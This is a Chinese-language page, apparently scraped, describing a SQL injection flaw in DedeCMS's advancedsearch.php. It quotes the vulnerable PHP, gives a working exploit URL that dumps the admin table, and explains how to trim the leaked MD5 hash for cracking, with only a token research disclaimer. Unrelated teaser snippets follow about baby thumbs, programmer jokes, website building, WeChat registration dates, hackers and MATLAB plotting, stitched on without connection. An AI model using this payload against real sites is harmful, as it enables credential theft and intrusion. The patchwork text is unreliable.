漏洞描述:
健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源。模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求。
plus/advancedsearch.php
$sql 变量未初始化。导致鸡助漏洞
复制代码代码如下:
if($mid == 0) //必须绕过。
{
showmsg('参数不正确,高级自定义搜索必须指定模型id', 'javascript');
exit();
}
$query = "select maintable, mainfields, addontable, addonfields, template from dede_advancedsearch where mid='$mid'";
$searchinfo = $dsql->GetOne($query);
if(!is_array($searchinfo)) //囧啊,绕过有难度。
{
showmsg('自定义搜索模型不存在','-1'); exit();
}
$template = $searchinfo['template'] != '' ? $searchinfo['template'] : 'advancedsearch.htm';
if(empty($sql)) //人品问题,成功绕过!{
..............
}else{
$sql = urldecode($sql);
$query = $sql;
}
$sql = urlencode($sql);
$dlist = new DataListCP();
$dlist->pageSize = 20;
$dlist->SetParameter("sql", $sql);
$dlist->SetParameter("mid", $mid);
...............
$dlist->SetTemplate($templatefile);
$dlist->SetSource($query);
.............<*参考
*>
测试 *** :
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码, *** 是,前减3后减1,得到16位MD5
宝宝出生时的手大多处于握拳状态,经常大拇指还在手心里握着,很难人为将他们手指伸直,如果拇指内扣的情况就很严重了,宝宝大拇指弯曲不伸开怎么办?几个月大拇指能伸开?下面友谊长存小编带来介绍。 宝宝大拇指...
关于程序员面试的笑话段子,你读懂几个? 程序员作为三高群体,经常会种种自嘲,而且还天生携带段子基因。下面这些程序员面试神回复,一般人哪能懂! 在程面试中...... 1: 面试官:“你以为,你最大的...
本文目录一览: 1、怎么创建一个自己的网站 2、自己怎么建立个网站 3、如何自己建一个网站 4、怎么创建一个网站? 怎么创建一个自己的网站 一、注册网站的域名。域名是因特网上的一个名称,...
查看注册微信時间(怎么查看注册微信時间?)近期有盆友问了我一个难题,如今我们要怎么查看自身手机微信的申请注册時间? 实际上有关这个问题,手机微信以前在2018年的数据信息报导中就会有,只不过是...
本文导读目录: 1、对于黑客你有怎样的理解? 2、黑客攻击的目的是什么? 3、黑客的行为特征。 4、红客、骇客、黑客的区别? 5、网络的黑客有什么用?就是入侵别人系统的,检查网站漏洞,...
三维曲线 plot3函数与plot函数用法十分相似,其调用格式为: plot3(x1,y1,z1,选项1,x2,y2,z2,选项2,…,xn,yn,zn,选项n) 其中每一组x,y,z组成一组曲线的坐...